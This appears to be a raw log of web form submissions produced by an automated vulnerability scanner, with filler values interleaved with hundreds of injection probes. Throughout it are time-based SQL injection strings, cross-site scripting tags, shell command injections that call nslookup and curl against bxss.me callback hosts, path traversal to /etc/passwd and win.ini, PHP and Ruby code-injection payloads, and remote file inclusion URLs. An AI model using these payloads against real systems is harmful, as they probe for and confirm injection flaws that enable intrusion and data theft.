555
1
555
1
555
1
555
1
555
1
555*if(now()=sysdate(),sleep(15),0)
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
1
555
1
555
1
555
1
555
1
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
1
555
1
555
1
555
1
555
1
555-1; waitfor delay '0:0:15' --
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555-1); waitfor delay '0:0:15' --
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555-1 waitfor delay '0:0:15' --
1
555
1
555
1
555
1
555
1
555ZpnrSsmJ'; waitfor delay '0:0:15' --
1
555
1
555
1
555
1
555
1
555-1 OR 90=(SELECT 90 FROM PG_SLEEP(15))--
1
555
1
555
1
555
1
555
1
555-1) OR 799=(SELECT 799 FROM PG_SLEEP(15))--
1
555
1
555
1
555
1
555
1
555-1)) OR 464=(SELECT 464 FROM PG_SLEEP(15))--
1
555
1
555
1
555
1
555
1
55597TwGCNc' OR 803=(SELECT 803 FROM PG_SLEEP(15))--
1
555
1
555
1
555
1
555
1
5555YrpeLhW') OR 183=(SELECT 183 FROM PG_SLEEP(15))--
1
555
1
555
1
555
1
555
1
555okKI9pvM')) OR 476=(SELECT 476 FROM PG_SLEEP(15))--
1
555
1
555
1
555
1
555
1
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1
555
1
555
1
555
1
555
1
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1
555
1
555
1
555'"
1
555
1
555????%2527%2522\'\"
1
555
1
@@z3CM6
1
(select 198766*667891)
1
555
1
(select 198766*667891 from DUAL)
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
1
555
xfs.bxss.me
555
1
555
1x5jT0Fob
xfs.bxss.me
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
'"
555
1
555
1
555
1
555
<!--
555
1'"()&%<zzz><ScRiPt >54YH(9899)</ScRiPt>
'"
1
<!--
1
555
'"()&%<zzz><ScRiPt >54YH(9252)</ScRiPt>
555
19688218
555
1
555'"()&%<zzz><ScRiPt >54YH(9817)</ScRiPt>
1
555
555
1
'"()&%<zzz><ScRiPt >54YH(9410)</ScRiPt>
1
555
12345'"\'\");|]*{ <>?''????
555
1
555
1
5559795683
1
555
555
1
555
1
12345'"\'\");|]*{ <>?''????
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
response.write(9580461*9243811)
555
'+response.write(9580461*9243811)+'
555
1
555
1
555
1
555
"+response.write(9580461*9243811)+"
555
1
response.write(9161565*9382876)
1
555
1
555
1
555
1
'+response.write(9161565*9382876)+'
1
555
1
"+response.write(9161565*9382876)+"
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
echo ynzfcl$()\ cyloey\nz^xyu||a #' &echo ynzfcl$()\ cyloey\nz^xyu||a #|" &echo ynzfcl$()\ cyloey\nz^xyu||a #
555
1
555
Gy1XqjZL
555
1
555
1
555
&echo aksgrt$()\ uyrdrv\nz^xyu||a #' &echo aksgrt$()\ uyrdrv\nz^xyu||a #|" &echo aksgrt$()\ uyrdrv\nz^xyu||a #
555
1
555
CKt1Q1pQ: bwY7Bcut
555
1
555
1&echo hvglic$()\ vvtdyk\nz^xyu||a #' &echo hvglic$()\ vvtdyk\nz^xyu||a #|" &echo hvglic$()\ vvtdyk\nz^xyu||a #
cSDZP1Jb
1
555
|echo nvdyap$()\ qgyrxq\nz^xyu||a #' |echo nvdyap$()\ qgyrxq\nz^xyu||a #|" |echo nvdyap$()\ qgyrxq\nz^xyu||a #
555
1
O8LqPi11: ZqFeWLTK
1
555
1
555
1|echo viysqr$()\ wvjxps\nz^xyu||a #' |echo viysqr$()\ wvjxps\nz^xyu||a #|" |echo viysqr$()\ wvjxps\nz^xyu||a #
555
1
555
1
555
1
555
expr 9000603124 - 947813
555
1
555
1
555
1
555
(nslookup -q=cname hitdrxbeqtmjh72545.bxss.me||curl hitdrxbeqtmjh72545.bxss.me))
555
1
555
$(nslookup -q=cname hitwlfwdrxcltaa1b8.bxss.me||curl hitwlfwdrxcltaa1b8.bxss.me)
555
1
555
1
555
../../../../../../../../../../../../../../etc/passwd
555
1
555
&nslookup -q=cname hithyjjimkvzf9ac65.bxss.me&'\"`0&nslookup -q=cname hithyjjimkvzf9ac65.bxss.me&`'
555
1
555
&(nslookup -q=cname hitfaxqnsfmuk2ba67.bxss.me||curl hitfaxqnsfmuk2ba67.bxss.me)&'\"`0&(nslookup -q=cname hitfaxqnsfmuk2ba67.bxss.me||curl hitfaxqnsfmuk2ba67.bxss.me)&`'
555
../../../../../../../../../../../../../../windows/win.ini
555
1
555
|(nslookup -q=cname hitrsurrrwbref9287.bxss.me||curl hitrsurrrwbref9287.bxss.me)
555
1<esi:include src="http://bxss.me/rpb.png"/>
555
file:///etc/passwd
555
1
555
`(nslookup -q=cname hithqjjcnocsg68782.bxss.me||curl hithqjjcnocsg68782.bxss.me)`
555<esi:include src="http://bxss.me/rpb.png"/>
1
555
1
555
1
555
1
555
../1
555
;(nslookup -q=cname hitaqqnjyvbsmb087a.bxss.me||curl hitaqqnjyvbsmb087a.bxss.me)|(nslookup -q=cname hitaqqnjyvbsmb087a.bxss.me||curl hitaqqnjyvbsmb087a.bxss.me)&(nslookup -q=cname hitaqqnjyvbsmb08
555
1
555
1
../../../../../../../../../../../../../../etc/passwd
1
555
1
555
|(nslookup${IFS}-q${IFS}cname${IFS}hitgapnxnipind945f.bxss.me||curl${IFS}hitgapnxnipind945f.bxss.me)
555
1
555
1
555
&(nslookup${IFS}-q${IFS}cname${IFS}hitdykcpvncsnc3603.bxss.me||curl${IFS}hitdykcpvncsnc3603.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitdykcpvncsnc3603.bxss.me||curl${IFS}h
../../../../../../../../../../../../../../windows/win.ini
1
echo cimzfc$()\ ghdmgp\nz^xyu||a #' &echo cimzfc$()\ ghdmgp\nz^xyu||a #|" &echo cimzfc$()\ ghdmgp\nz^xyu||a #
1
555
1
file:///etc/passwd
1
555
1
555
1
555
1
&echo izprto$()\ zapjnq\nz^xyu||a #' &echo izprto$()\ zapjnq\nz^xyu||a #|" &echo izprto$()\ zapjnq\nz^xyu||a #
1
555
1
555
${10000206+9999719}
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
../555
1
555&echo jlbacb$()\ swbktt\nz^xyu||a #' &echo jlbacb$()\ swbktt\nz^xyu||a #|" &echo jlbacb$()\ swbktt\nz^xyu||a #
1
${9999470+9999380}
1
555
1
|echo nncbgu$()\ fugqyr\nz^xyu||a #' |echo nncbgu$()\ fugqyr\nz^xyu||a #|" |echo nncbgu$()\ fugqyr\nz^xyu||a #
1
555
';print(md5(31337));$a='
555
1
555|echo iicwtz$()\ jmmdlr\nz^xyu||a #' |echo iicwtz$()\ jmmdlr\nz^xyu||a #|" |echo iicwtz$()\ jmmdlr\nz^xyu||a #
1
555
";print(md5(31337));$a="
555
1
555
1
555
${@print(md5(31337))}
expr 9000522725 - 920145
1
555
1
555
1
555
${@print(md5(31337))}\
(nslookup -q=cname hitdjoclhpjil29b7e.bxss.me||curl hitdjoclhpjil29b7e.bxss.me))
1
555
1
555
1
555
'.print(md5(31337)).'
$(nslookup -q=cname hitrchjckdvmgdb220.bxss.me||curl hitrchjckdvmgdb220.bxss.me)
1
555
1
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
1
&nslookup -q=cname hitlhbjtsljed91fbb.bxss.me&'\"`0&nslookup -q=cname hitlhbjtsljed91fbb.bxss.me&`'
1
555
1
555
1
';print(md5(31337));$a='
1
&(nslookup -q=cname hittdpdcfkxsq997a3.bxss.me||curl hittdpdcfkxsq997a3.bxss.me)&'\"`0&(nslookup -q=cname hittdpdcfkxsq997a3.bxss.me||curl hittdpdcfkxsq997a3.bxss.me)&`'
1
";print(md5(31337));$a="
1
555
1
555
1
|(nslookup -q=cname hitehdiltvaqf9d298.bxss.me||curl hitehdiltvaqf9d298.bxss.me)
1
${@print(md5(31337))}
1
555
'.gethostbyname(lc('hitqq'.'qubydaso038c7.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(76).chr(122).chr(87).'
${@print(md5(31337))}\
1
555
".gethostbyname(lc("hitkp"."qwgaezsu6bcf0.bxss.me."))."A".chr(67).chr(hex("58")).chr(111).chr(77).chr(103).chr(74)."
'.print(md5(31337)).'
1
555
1
555
gethostbyname(lc('hitmi'.'jvxghzkf9204f.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(110).chr(73).chr(110).chr(89)
555
1
555
1
'.gethostbyname(lc('hitoi'.'amzvzwpt6f1ef.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(100).chr(74).chr(117).chr(78).'
1
`(nslookup -q=cname hitktgulzkdrude86f.bxss.me||curl hitktgulzkdrude86f.bxss.me)`
1
".gethostbyname(lc("hitnf"."yuukbfbc6fbf2.bxss.me."))."A".chr(67).chr(hex("58")).chr(106).chr(89).chr(110).chr(65)."
1
555
1
555
1
;(nslookup -q=cname hitbohzvcdhjj547db.bxss.me||curl hitbohzvcdhjj547db.bxss.me)|(nslookup -q=cname hitbohzvcdhjj547db.bxss.me||curl hitbohzvcdhjj547db.bxss.me)&(nslookup -q=cname hitbohzvcdhjj547db.bxss.me||curl hitbohzvcdhjj547db.bxss.me)
1
gethostbyname(lc('hiths'.'wickcjlr9ee68.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(98).chr(82).chr(121).chr(89)
1
555
1
555
1
555
1
|(nslookup${IFS}-q${IFS}cname${IFS}hitvejlskqijc61724.bxss.me||curl${IFS}hitvejlskqijc61724.bxss.me)
1
555
1
555
1
555
1
&(nslookup${IFS}-q${IFS}cname${IFS}hitvebgmagtzy0e0e8.bxss.me||curl${IFS}hitvebgmagtzy0e0e8.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitvebgmagtzy0e0e8.bxss.me||curl${IFS}hitvebgmagtzy0e0e8.bxss.me)&`'
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
-1 OR 5*5=25 --
555
1
555
1
555
1
555
1
555
1
555
-1 OR 5*5=25
555
1
555
1
555
1
555
-1' OR 5*5=25 --
555
1
555
1
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555
1
555
1
555
-1" OR 5*5=25 --
555
1
555
1
555
1
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
555
1
555
1
555
-1' OR 5*5=25 or 'zSqjs96M'='
555
1
555
1
555
1
555
/etc/shells
555
1
555
1
555
1
555
-1" OR 5*5=25 or "dap1X5vB"="
555
1
555
1
555
1
555
../../../../../../../../../../../../../../etc/shells
555
1
555
1
555
1
555
c:/windows/win.ini
555
1
555
1
555
1
555
1
555
bxss.me
555
1
555
1
555
1
555
Http://bxss.me/t/fit.txt
555
1
555
1
555
1
555
http://bxss.me/t/fit.txt?.jpg
555
1
555
1
555
1
555
1
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
1
555
1
555
1
555
1
555
1
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
1
555
1
555
1
555
1
555
1
555
1
/etc/shells
1
../../../../../../../../../../../../../../etc/shells
1
555
HttP://bxss.me/t/xss.html?%00
555
1
555
1
555
1
c:/windows/win.ini
1
555
1
555
1
555
1
555
1*if(now()=sysdate(),sleep(15),0)
555
bxss.me/t/xss.html?%00
555
1
555
1
bxss.me
1
555
1
HttP://bxss.me/t/xss.html?%00
1
555
1
Http://bxss.me/t/fit.txt
1
555
1
bxss.me/t/xss.html?%00
1
555
1
http://bxss.me/t/fit.txt?.jpg
1
555
1
555
1
555
"+"A".concat(70-3).concat(22*4).concat(118).concat(72).concat(112).concat(65)+(require"socket" Socket.gethostbyname("hitbv"+"gekijmlyf9ff3.bxss.me.")[3].to_s)+&
555
1
555
1
555
1
555
1
555
1
555
1
555
'+'A'.concat(70-3).concat(22*4).concat(121).concat(67).concat(107).concat(82)+(require'socket' Socket.gethostbyname('hitvo'+'jpiopqpl24afe.bxss.me.')[3].to_s)+&
555
1
555
1
555
1
555
1
555
'A'.concat(70-3).concat(22*4).concat(117).concat(80).concat(112).concat(76)+(require'socket' Socket.gethostbyname('hitci'+'kytzijkg9d902.bxss.me.')[3].to_s)
555
1
555
1
555
1
"+"A".concat(70-3).concat(22*4).concat(98).concat(74).concat(117).concat(77)+(require"socket" Socket.gethostbyname("hityt"+"mlnyzvpwc9fa0.bxss.me.")[3].to_s)+"
1
555
1
555
1
555
1
555
1
555
1
'+'A'.concat(70-3).concat(22*4).concat(111).concat(72).concat(111).concat(75)+(require'socket' Socket.gethostbyname('hitnj'+'lbyycdswb67fe.bxss.me.')[3].to_s)+'
1
555
1
555
1
555
1
555
1
555
1
'A'.concat(70-3).concat(22*4).concat(121).concat(69).concat(105).concat(89)+(require'socket' Socket.gethostbyname('hitwl'+'czfqrdmf93294.bxss.me.')[3].to_s)
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
depoimentos
555
1
555
1
555
1
555
1
555
depoimentos
555
1
555
1
555
redirtest.acx
555
depoimentos/.
555
1
555
1
redirtest.acx
1
depoimentos
1
555
1
555
1
555
1
555
1
555
1
555
1
depoimentos
1
555
1
depoimentos/.
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1&n968910=v908306
555
1
555
1
555&n976333=v973683
1
555
1
555
)
555
1
555
1
555
1
555
1
555
!(()&&!|*|*|
555
1
555
1
555
1
555
^(#$!@#$)(()))******
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
)
1
555
1
555
1
555
1
!(()&&!|*|*|
1
555
1
555
1
555
1
^(#$!@#$)(()))******
1
555
1
555
1
555
1
555
1
555
1
555
1
555
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z
555
1
555
1
555
555
1
555
1
555
1
555
1
555
1
555
555
1
555
1
555
1
555
1
555
1
555
555
1
555
1
555
555
1
555
'"()
555
1
555
1
555
1
555
1'&&sleep(27*1000)*wavzzw&&'
555
1
555
1
555
1
555
1"&&sleep(27*1000)*emnfve&&"
555
1
555
1
555
1
555
1
555
1'||sleep(27*1000)*maqwhf||'
555
1
555
1
555
1
555
1"||sleep(27*1000)*rwyaor||"
555
1
555
1
555
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
'"()
1
555
1
555
1
555'&&sleep(27*1000)*fjvwco&&'
1
555
1
555
1
555
1
555"&&sleep(27*1000)*yinagm&&"
1
555
1
555
1
555'||sleep(27*1000)*jyegag||'
1
555
1
555"||sleep(27*1000)*yqsyqk||"
1
555
1
555
1
555
1
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1-1; waitfor delay '0:0:15' --
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1-1); waitfor delay '0:0:15' --
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1-1 waitfor delay '0:0:15' --
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1IQCtsm2x'; waitfor delay '0:0:15' --
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1-1 OR 648=(SELECT 648 FROM PG_SLEEP(15))--
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1-1) OR 421=(SELECT 421 FROM PG_SLEEP(15))--
555
1
555
1
555
1-1)) OR 672=(SELECT 672 FROM PG_SLEEP(15))--
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1SpxvE6uk' OR 293=(SELECT 293 FROM PG_SLEEP(15))--
555
1
555
1
555
1AHeqKtCp') OR 718=(SELECT 718 FROM PG_SLEEP(15))--
555
1
555
1
555
1ITqDULsp')) OR 887=(SELECT 887 FROM PG_SLEEP(15))--
555
1
555
1
555
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
1
555
1
555
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
1
555
1'"
555
1
555
1????%2527%2522\'\"
555
1
555
@@EXRGh
555
(select 198766*667891)
555
(select 198766*667891 from DUAL)
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555hazTyWQd
1
555
17dw20KZ9
555
1
555
1
555
1
-1 OR 5*5=25 --
1
555
1
555
1
-1 OR 5*5=25
1
555
-1 OR 5*5=25 --
555
1
-1' OR 5*5=25 --
1
555
-1 OR 5*5=25
-1" OR 5*5=25 --
1
555
-1' OR 5*5=25 --
-1' OR 5*5=25 or 'qOSG6EKp'='
1
555
-1" OR 5*5=25 --
-1" OR 5*5=25 or "0V5MLdMW"="
1
555
-1' OR 5*5=25 or 'K9E2Lzl2'='
555
-1" OR 5*5=25 or "BqLwXTy5"="
555
1
555
1
555*if(now()=sysdate(),sleep(15),0)
1
555
1*if(now()=sysdate(),sleep(15),0)
555
1
555
1
555
1
555
1
555
1
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
1
555
1
555
1
555
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z
555
1
555
1
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
1
555
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z
555
1
555
1
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
1
555
1
555
1
555
1
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555
1
555
1
555
1
555
1
555-1; waitfor delay '0:0:15' --
1
555
1-1; waitfor delay '0:0:15' --
555
1
555
1
555-1); waitfor delay '0:0:15' --
1
555
1-1); waitfor delay '0:0:15' --
555
1
555
1
555
1
555
1
555-1 waitfor delay '0:0:15' --
1
555
1
555
1
555
1
555
1
555
1-1 waitfor delay '0:0:15' --
555
1
5555GziopLF'; waitfor delay '0:0:15' --
1
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
1
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
1
555
xfs.bxss.me
555
1
xfs.bxss.me
1
555
1
555
1
555
1
555
1
555
1tbHAR9TD'; waitfor delay '0:0:15' --
555
1
555
1
555
'"
555
1
555
<!--
555
1
'"
1
555
1
555
1
<!--
1
555
1
555
1'"()&%<zzz><ScRiPt >wevP(9483)</ScRiPt>
555
1
555
1
555
1
555
'"()&%<zzz><ScRiPt >wevP(9794)</ScRiPt>
555
555
1
555
1
555
19246513
555
12345'"\'\");|]*{ <>?''????
555-1 OR 715=(SELECT 715 FROM PG_SLEEP(15))--
1
555
1
555
1
555'"()&%<zzz><ScRiPt >wevP(9821)</ScRiPt>
1
555
555
1
555
1
555
1
555
1
'"()&%<zzz><ScRiPt >wevP(9308)</ScRiPt>
1
555
1
555
1
12345'"\'\");|]*{ <>?''????
1
555
1-1 OR 759=(SELECT 759 FROM PG_SLEEP(15))--
555
response.write(9259271*9347232)
5559326594
1
555
1
555
1
555
1
555
1
555
'+response.write(9259271*9347232)+'
555
1
555
1
555
1
555
"+response.write(9259271*9347232)+"
555
1
555
1
555
echo wnfviw$()\ vkwyio\nz^xyu||a #' &echo wnfviw$()\ vkwyio\nz^xyu||a #|" &echo wnfviw$()\ vkwyio\nz^xyu||a #
555
1
555
&echo emqrwq$()\ hinvsi\nz^xyu||a #' &echo emqrwq$()\ hinvsi\nz^xyu||a #|" &echo emqrwq$()\ hinvsi\nz^xyu||a #
555
1
response.write(9241579*9211524)
1
555
1
555
1&echo wxhlwq$()\ eyghho\nz^xyu||a #' &echo wxhlwq$()\ eyghho\nz^xyu||a #|" &echo wxhlwq$()\ eyghho\nz^xyu||a #
555
wLCoyfSt
555-1) OR 440=(SELECT 440 FROM PG_SLEEP(15))--
1
'+response.write(9241579*9211524)+'
1
555
1
555
1
555
RLbSoHpf: ITe6g7ds
555
|echo kldhbm$()\ wninfu\nz^xyu||a #' |echo kldhbm$()\ wninfu\nz^xyu||a #|" |echo kldhbm$()\ wninfu\nz^xyu||a #
"+response.write(9241579*9211524)+"
1
oUerbfxB
1
555
1|echo kxjhtd$()\ nwklxw\nz^xyu||a #' |echo kxjhtd$()\ nwklxw\nz^xyu||a #|" |echo kxjhtd$()\ nwklxw\nz^xyu||a #
555
1
555
1
555
expr 9000872260 - 965336
555
1
XaRcCk2S: yDQyic1r
1
555
1
555
1
555
(nslookup -q=cname hitryyvwxlile4ce39.bxss.me||curl hitryyvwxlile4ce39.bxss.me))
555
1
555
1
555
1
555
1
555
$(nslookup -q=cname hitorevcycnsbc1773.bxss.me||curl hitorevcycnsbc1773.bxss.me)
555
1
555
1
555
&nslookup -q=cname hiteuwzcahavd683f3.bxss.me&'\"`0&nslookup -q=cname hiteuwzcahavd683f3.bxss.me&`'
555
1-1) OR 871=(SELECT 871 FROM PG_SLEEP(15))--
555
1
555
&(nslookup -q=cname hitdlhldcjjpzb88de.bxss.me||curl hitdlhldcjjpzb88de.bxss.me)&'\"`0&(nslookup -q=cname hitdlhldcjjpzb88de.bxss.me||curl hitdlhldcjjpzb88de.bxss.me)&`'
555
1
555
1
555
|(nslookup -q=cname hitpbtqkdrorge2063.bxss.me||curl hitpbtqkdrorge2063.bxss.me)
555
1
555
1
555
1
555
`(nslookup -q=cname hitgixcakcfoea28a5.bxss.me||curl hitgixcakcfoea28a5.bxss.me)`
555
1
555
1
555
1
555
;(nslookup -q=cname hitzizbecqmth48997.bxss.me||curl hitzizbecqmth48997.bxss.me)|(nslookup -q=cname hitzizbecqmth48997.bxss.me||curl hitzizbecqmth48997.bxss.me)&(nslookup -q=cname hitzizbecqmth489
555
1
555
1
555
1
555
|(nslookup${IFS}-q${IFS}cname${IFS}hituhfeepiuob5f431.bxss.me||curl${IFS}hituhfeepiuob5f431.bxss.me)
555
1
555
1
555
1
555-1)) OR 251=(SELECT 251 FROM PG_SLEEP(15))--
1
555
1
555
&(nslookup${IFS}-q${IFS}cname${IFS}hitdokcgqilin4177e.bxss.me||curl${IFS}hitdokcgqilin4177e.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitdokcgqilin4177e.bxss.me||curl${IFS}h
555
1
555
1
555
1
555
1
555
1
echo bqiffe$()\ xkzpiz\nz^xyu||a #' &echo bqiffe$()\ xkzpiz\nz^xyu||a #|" &echo bqiffe$()\ xkzpiz\nz^xyu||a #
1
555
1
555
1
555
1
555
1
555
1
&echo rovqqc$()\ qejjhb\nz^xyu||a #' &echo rovqqc$()\ qejjhb\nz^xyu||a #|" &echo rovqqc$()\ qejjhb\nz^xyu||a #
1
555
1
555
1
555
1
555
1
555&echo tzyhqg$()\ mltoyd\nz^xyu||a #' &echo tzyhqg$()\ mltoyd\nz^xyu||a #|" &echo tzyhqg$()\ mltoyd\nz^xyu||a #
1
555
1
555
1
555
1
|echo hpnezq$()\ wfjyay\nz^xyu||a #' |echo hpnezq$()\ wfjyay\nz^xyu||a #|" |echo hpnezq$()\ wfjyay\nz^xyu||a #
1
555
1
555
1
555
1
555
../../../../../../../../../../../../../../etc/passwd
555|echo pgsyni$()\ mcdujh\nz^xyu||a #' |echo pgsyni$()\ mcdujh\nz^xyu||a #|" |echo pgsyni$()\ mcdujh\nz^xyu||a #
1
555
../../../../../../../../../../../../../../windows/win.ini
555
1
555
1<esi:include src="http://bxss.me/rpb.png"/>
555
1
555
file:///etc/passwd
555
1
555<esi:include src="http://bxss.me/rpb.png"/>
1
555
1
expr 9000832321 - 983342
1
555
1
555
1
555
1
(nslookup -q=cname hitwoazhrbmbu8c49c.bxss.me||curl hitwoazhrbmbu8c49c.bxss.me))
1
555
1
555
1
$(nslookup -q=cname hitdbktaxoygeea63c.bxss.me||curl hitdbktaxoygeea63c.bxss.me)
1
555
1
555
../1
555
1
555
1
&nslookup -q=cname hitauhkgkzrbee7c68.bxss.me&'\"`0&nslookup -q=cname hitauhkgkzrbee7c68.bxss.me&`'
1
555
${9999313+9999551}
../../../../../../../../../../../../../../etc/passwd
1
555
1
&(nslookup -q=cname hitkamjiiutbp326d5.bxss.me||curl hitkamjiiutbp326d5.bxss.me)&'\"`0&(nslookup -q=cname hitkamjiiutbp326d5.bxss.me||curl hitkamjiiutbp326d5.bxss.me)&`'
1
${9999889+10000368}
1
555
1
555
1
|(nslookup -q=cname hitopmsmrjacsddcb7.bxss.me||curl hitopmsmrjacsddcb7.bxss.me)
1
../../../../../../../../../../../../../../windows/win.ini
1
555
1
555
1
555
1-1)) OR 743=(SELECT 743 FROM PG_SLEEP(15))--
`(nslookup -q=cname hitjcufrdytphd35f1.bxss.me||curl hitjcufrdytphd35f1.bxss.me)`
1
555
1
file:///etc/passwd
1
555
1
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
1
555
1
;(nslookup -q=cname hiteqxvtjfocvde764.bxss.me||curl hiteqxvtjfocvde764.bxss.me)|(nslookup -q=cname hiteqxvtjfocvde764.bxss.me||curl hiteqxvtjfocvde764.bxss.me)&(nslookup -q=cname hiteqxvtjfocvde764.bxss.me||curl hiteqxvtjfocvde764.bxss.me)
1
555
';print(md5(31337));$a='
555
1
555
1
../555
1
555
";print(md5(31337));$a="
555
1
555
1
|(nslookup${IFS}-q${IFS}cname${IFS}hitnwkonjnyfa72685.bxss.me||curl${IFS}hitnwkonjnyfa72685.bxss.me)
1
555
1
555
1
&(nslookup${IFS}-q${IFS}cname${IFS}hituruocmmczwa29e4.bxss.me||curl${IFS}hituruocmmczwa29e4.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hituruocmmczwa29e4.bxss.me||curl${IFS}hituruocmmczwa29e4.bxss.me)&`'
1
555
${@print(md5(31337))}
555
1
555
1
555
1
555
'.gethostbyname(lc('hithl'.'nuuawtur8e1a8.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(100).chr(66).chr(119).chr(80).'
555
${@print(md5(31337))}\
555
1
555
1
555S6HaH3qv' OR 931=(SELECT 931 FROM PG_SLEEP(15))--
1
555
".gethostbyname(lc("hitmu"."mmyrgbwh945b6.bxss.me."))."A".chr(67).chr(hex("58")).chr(106).chr(79).chr(115).chr(84)."
555
'.print(md5(31337)).'
555
1
555
1
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555
gethostbyname(lc('hitpw'.'lpswomhfa7d13.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(117).chr(82).chr(113).chr(84)
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
1
555
1
555
1
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
'.gethostbyname(lc('hitel'.'qpwnyeck35c89.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(87).chr(97).chr(86).'
1
555
1
555
1
';print(md5(31337));$a='
1
".gethostbyname(lc("hituq"."xsjewlut0f301.bxss.me."))."A".chr(67).chr(hex("58")).chr(107).chr(85).chr(113).chr(67)."
1
555
1
555
1
555
1
